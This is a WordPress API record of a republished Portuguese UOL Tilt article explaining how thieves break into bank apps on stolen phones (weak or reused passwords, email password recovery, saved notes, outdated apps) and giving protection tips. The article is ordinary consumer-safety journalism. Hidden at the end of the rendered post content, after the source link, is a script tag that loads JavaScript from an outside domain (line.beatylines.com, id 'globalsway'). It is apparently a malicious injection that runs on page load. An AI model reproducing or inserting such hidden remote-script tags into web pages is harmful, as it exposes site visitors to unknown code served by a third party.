{"id":813,"date":"1969-12-31T21:00:00","date_gmt":"1970-01-01T00:00:00","guid":{"rendered":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/como-ladroes-conseguem-invadir-aplicativos-de-banco-apos-roubo-do-celular-09-05-2022\/"},"modified":"1969-12-31T21:00:00","modified_gmt":"1970-01-01T00:00:00","slug":"como-ladroes-conseguem-invadir-aplicativos-de-banco-apos-roubo-do-celular-09-05-2022","status":"publish","type":"post","link":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/como-ladroes-conseguem-invadir-aplicativos-de-banco-apos-roubo-do-celular-09-05-2022\/","title":{"rendered":"Como ladr\u00f5es conseguem invadir aplicativos de banco ap\u00f3s roubo do celular &#8211; 09\/05\/2022"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p>Um relato sobre preju\u00edzo financeiro e estresse gerados ap\u00f3s o <a href=\"https:\/\/economia.uol.com.br\/noticias\/redacao\/2022\/05\/07\/celular-e-furtado-e-ladroes-movimentam-r-143-mil-mesmo-apos-aviso-a-bancos.htm\">roubo de um celular viralizou<\/a> nos \u00faltimos dias. Criminosos chegaram a movimentar das contas de Bruno De Paula, 36, <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2022\/05\/07\/guia-definitivo-para-proteger-seus-dados-caso-seu-celular-seja-roubado.htm\">mais de R$ 143 mil<\/a>, divididos entre empr\u00e9stimos, transfer\u00eancias via Pix e pagamento de boletos.<\/p>\n<p>Os valores ser\u00e3o <span>estornados<\/span> pelos bancos envolvidos, mas o caso <span>reacendeu<\/span> d\u00favidas sobre o quanto os aplicativos de institui\u00e7\u00f5es financeiras s\u00e3o seguros. S\u00f3 em S\u00e3o Paulo, <a href=\"http:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2020\/09\/24\/celular-roubado-com-tela-desbloqueada-gera-prejuizo-de-r-225-mil-a-vitima.htm\">crimes do tipo tem se multiplicado<\/a>, chamando a aten\u00e7\u00e3o da Pol\u00edcia Civil e <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2021\/06\/24\/procon-sp-quer-criar-central-de-reclamacao-para-vitimas-de-roubo-de-celular.htm\">do \u00f3rg\u00e3o de defesa ao consumidor Procon-SP.<\/a><\/p>\n<p>Entenda a seguir como esses criminosos costumam agir e como conseguem ter acesso aos dados banc\u00e1rios das v\u00edtimas.<\/p>\n<h2>N\u00e3o \u00e9 preciso hackear o telefone<\/h2>\n<p>Especialistas da \u00e1rea de seguran\u00e7a digital j\u00e1 ouvidos por <strong>Tilt<\/strong> afirmam que o mais prov\u00e1vel \u00e9 que criminosos estejam operando &#8220;na malandragem&#8221;, se aproveitando de descuidos de algumas v\u00edtimas, e n\u00e3o utilizando ferramentas avan\u00e7adas de \u00faltima gera\u00e7\u00e3o.<\/p>\n<p>Embora existam ferramentas no mercado que permitem for\u00e7ar o desbloqueio de um <a href=\"https:\/\/www.uol.com.br\/tilt\/smartphone\/\">celular<\/a> \u2014como os <em><span>rootkits<\/span> <\/em><a href=\"https:\/\/www.uol.com.br\/tilt\/reportagens-especiais\/pericia-em-celular-como-e-feita-quais-as-ferramentas-e-mais-\/\">usados por peritos para investigar <\/a><span><a href=\"https:\/\/www.uol.com.br\/tilt\/reportagens-especiais\/pericia-em-celular-como-e-feita-quais-as-ferramentas-e-mais-\/\">telefones<\/a>\u2014<\/span>, esse processo \u00e9 mais demorado, caro e complexo.<\/p>\n<p>Por isso, muitos criminosos preferem roubar celulares que j\u00e1 estejam desbloqueados \u2014 <a href=\"https:\/\/economia.uol.com.br\/noticias\/redacao\/2022\/05\/07\/celular-e-furtado-e-ladroes-movimentam-r-143-mil-mesmo-apos-aviso-a-bancos.htm\" target=\"_blank\" rel=\"noopener\">como foi caso de Bruno De Paula<\/a>, que teve seu aparelho roubado enquanto voltava para casa dentro de um t\u00e1xi.<\/p>\n<p>E como os criminosos conseguem acessar dados e aplicativos das v\u00edtimas? Os deslizes mais comuns s\u00e3o:<\/p>\n<p><strong>Usar data de anivers\u00e1rio como senha: <\/strong><span>se o ladr\u00e3o, por exemplo, roubou o celular e a sua carteira, ele pode usar os dados de documentos pessoais para tentar desbloquear o aparelho ou acessar aplicativos caso o telefone j\u00e1 esteja com a tela liberada no momento da a\u00e7\u00e3o. <\/span><\/p>\n<p>Outro exemplo: os criminosos podem procurar informa\u00e7\u00f5es da v\u00edtima dentro do pr\u00f3prio celular, como uma ficha m\u00e9dica de emerg\u00eancia que fica acess\u00edvel sem o desbloqueio e que pode constar, entre outras informa\u00e7\u00f5es, a data de nascimento <span>ou outros dados pessoais (que tamb\u00e9m s\u00e3o comuns na hora de criar combina\u00e7\u00f5es).<\/span><\/p>\n<p><strong>Combina\u00e7\u00f5es f\u00e1ceis de descobrir: <\/strong>um levantamento<strong> <\/strong>da empresa de seguran\u00e7a <span>Nordpass<\/span> apontou que a senha &#8220;123456&#8221; \u00e9 a mais comum usada do mundo \u2014 s\u00f3 em 2020, mais de 2,5 milh\u00f5es de pessoas tiveram dados vazados na internet usando essa combina\u00e7\u00e3o. Outras sequ\u00eancias simples de n\u00fameros tamb\u00e9m aparecem no <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2020\/11\/18\/senha-em-portugues-entra-para-o-ranking-das-mais-usadas-e-ela-e-pessima.htm\">ranking das piores senhas<\/a>.<\/p>\n<p><strong>Uso da mesma senha em v\u00e1rios servi\u00e7os <\/strong><span><strong>online:<\/strong> Uma vez que a pessoa descobre uma senha de acesso, \u00e9 prov\u00e1vel que ela tente usar a mesma combina\u00e7\u00e3o em outros servi\u00e7os online usados no celular da v\u00edtima, como: <span>emails<\/span>, apps do banco, plataformas de compras, entre outros. <\/span><\/p>\n<p><strong>Deixar senha do banco anotada no celular:<\/strong> \u00e9 tanta senha que precisamos lembrar que muitos acreditam na praticidade de manter as combina\u00e7\u00f5es salvas no celular, como no bloco de notas, email. O problema \u00e9 que os bandidos podem facilmente descobrir.<\/p>\n<p><strong>Sistema operacional e aplicativos de bancos desatualizados:<\/strong> \u00e9 fundamental manter os programas do celular atualizados, pois os chamados updates servem tamb\u00e9m para corrigir vulnerabilidades descobertas \u2014como um erro na autentica\u00e7\u00e3o da senha do banco no celular, por exemplo. Se a pessoa n\u00e3o tem o costume de fazer isso, ela aumenta as chances de se tornar v\u00edtima.<\/p>\n<p><strong>E se a v\u00edtima n\u00e3o tiver nenhum deslize? <\/strong>\u00c9 sempre bom lembrar que as tecnologias n\u00e3o s\u00e3o perfeitas. Ainda que dif\u00edcil, segundo os especialistas, n\u00e3o \u00e9 imposs\u00edvel que cibercriminosos tenham conseguindo encontrar formas ainda n\u00e3o mapeadas pelas empresas de seguran\u00e7a e fabricantes.<\/p>\n<h2>Como ladr\u00f5es entram no seu app de banco<\/h2>\n<p>Depois do roubo do celular, alguns criminosos partem para tentativas de realizar transa\u00e7\u00f5es atrav\u00e9s do aplicativo de banco instalado. Mesmo que a senha para confirmar os processos n\u00e3o esteja anotada em algum <a href=\"https:\/\/www.uol.com.br\/tilt\/app\/ \">app<\/a> do celular, n\u00e3o \u00e9 t\u00e3o dif\u00edcil criar uma nova.<\/p>\n<p>Isso ocorre porque alguns bancos utilizam o email informado pelo usu\u00e1rio para ajudar na recupera\u00e7\u00e3o de senha. Como muita gente mant\u00e9m o email logado no pr\u00f3prio aparelho, os ladr\u00f5es conseguir\u00e3o ter acesso aos passos seguintes para reativar o acesso.<\/p>\n<p>E, caso eles precisem confirmar dados pessoais da v\u00edtima (como nome e CPF), as informa\u00e7\u00f5es podem ser encontradas facilmente no aparelho em mensagens, SMS, email, fotos de documentos, <a href=\"https:\/\/www.uol.com.br\/tilt\/redes-sociais\/ \">redes sociais<\/a> etc.<\/p>\n<p>Ainda existe a possibilidade, ainda que em menor escala, de que criminosos usem programas dedicados para quebrar a prote\u00e7\u00e3o dos apps de bancos com base em brechas antigas ou ainda n\u00e3o descobertas. No caso de alguns celulares roubados, essas brechas talvez ainda n\u00e3o tenham sido corrigidas porque o dono do telefone n\u00e3o atualizou seus aplicativos.<\/p>\n<p>Contudo, &#8220;arrombar&#8221; as portas de um aplicativo banc\u00e1rio pode levar semanas. Tirar proveito de descuidos das v\u00edtimas, dados vazados ou aplicar um golpe nas institui\u00e7\u00f5es financeiras leva minutos.<\/p>\n<p>Para garantir mais seguran\u00e7a aos seus apps banc\u00e1rios, mais dicas s\u00e3o:<\/p>\n<ul>\n<li>configure seu app de banco para pedir n\u00e3o s\u00f3 a senha, mas o n\u00famero da conta e da ag\u00eancia sempre que for aberto;<\/li>\n<li>n\u00e3o guarde fotos de documentos ou de cart\u00f5es de cr\u00e9dito na galeria (eles podem facilitar a vida do ladr\u00e3o que ligar no banco para criar uma senha nova);<\/li>\n<\/ul>\n<p>De qualquer forma, caso o seu celular seja roubado\/furtado ou perdido, \u00e9 importante correr para limpar suas informa\u00e7\u00f5es remotamente. <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2017\/08\/14\/furtaram-meu-celular-e-agora-saiba-o-que-fazer-apos-ser-roubado.htm\">Veja aqui o que voc\u00ea precisa fazer imediatamente<\/a>.<\/p>\n<h2>Mais dicas de prote\u00e7\u00e3o<\/h2>\n<ul>\n<li>Esconda o conte\u00fado das notifica\u00e7\u00f5es na tela de bloqueio (algumas, como de mensagens, podem incluir c\u00f3digos de autentica\u00e7\u00e3o em duas etapas);<\/li>\n<li>Configure o celular para n\u00e3o permitir que o controle do wi-fi e do <span>3G\/4G<\/span> seja acessado com o aparelho bloqueado (criminosos desligam a internet para evitar a formata\u00e7\u00e3o remota);<\/li>\n<li>Ajuste o tempo de tela do telefone para que ele seja bloqueado ap\u00f3s alguns segundos sem usar &#8212; ou m\u00ednimo de tempo poss\u00edvel permitido pelo sistema.<\/li>\n<\/ul>\n<p><em>*Com reportagem de Lucas Carvalho, de Tilt.<\/em><\/p>\n<p>**<a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2021\/06\/28\/na-malandragem-como-bandidos-invadem-apps-de-banco-de-celulares-roubados.htm\">Fontes<\/a><a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2021\/06\/28\/na-malandragem-como-bandidos-invadem-apps-de-banco-de-celulares-roubados.htm\"> consultadas<\/a>: <span>Hiago<\/span><span> <\/span><span>Kin<\/span>, presidente da <span>Abraseci<\/span> (Associa\u00e7\u00e3o Brasileira de Seguran\u00e7a Cibern\u00e9tica) e presidente executivo da empresa de seguran\u00e7a digital <span>Decript<\/span>; Daniel Barbosa, especialista em seguran\u00e7a da informa\u00e7\u00e3o e pesquisador da empresa <span><span><span>Eset; <\/span><\/span><\/span>Israel <span>Wernik<\/span>, pesquisador da <span>Check<\/span><span> <\/span><span>Point<\/span><span> <\/span><span>Research<\/span>; Daiane Santos, engenheira de seguran\u00e7a; e Denis <span>Riviello<\/span>, especialista em ciberseguran\u00e7a e diretor da <span>Compugraf<\/span>.<\/p>\n<\/p><\/div>\n<p><br \/>\n<br \/><a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2022\/05\/09\/celular-roubado-como-criminosos-invadem-aplicativos-de-banco.htm\">Source link <\/a><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Um relato sobre preju\u00edzo financeiro e estresse gerados ap\u00f3s o roubo de um celular viralizou nos \u00faltimos dias. Criminosos chegaram a movimentar das contas de Bruno De Paula, 36, mais de R$ 143 mil, divididos entre empr\u00e9stimos, transfer\u00eancias via Pix e pagamento de boletos. Os valores ser\u00e3o estornados pelos bancos envolvidos, mas o caso reacendeu&#8230;<\/p>\n","protected":false},"author":1,"featured_media":814,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_kad_post_transparent":"","_kad_post_title":"","_kad_post_layout":"","_kad_post_sidebar_id":"","_kad_post_content_style":"","_kad_post_vertical_padding":"","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"footnotes":""},"categories":[1],"tags":[1082,62,698,154,12,1743,1744,1742,1707],"class_list":["post-813","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sem-categoria","tag-aplicativos","tag-apos","tag-banco","tag-celular","tag-como","tag-conseguem","tag-invadir","tag-ladroes","tag-roubo"],"_links":{"self":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/813","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/comments?post=813"}],"version-history":[{"count":0,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/813\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media\/814"}],"wp:attachment":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media?parent=813"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/categories?post=813"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/tags?post=813"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}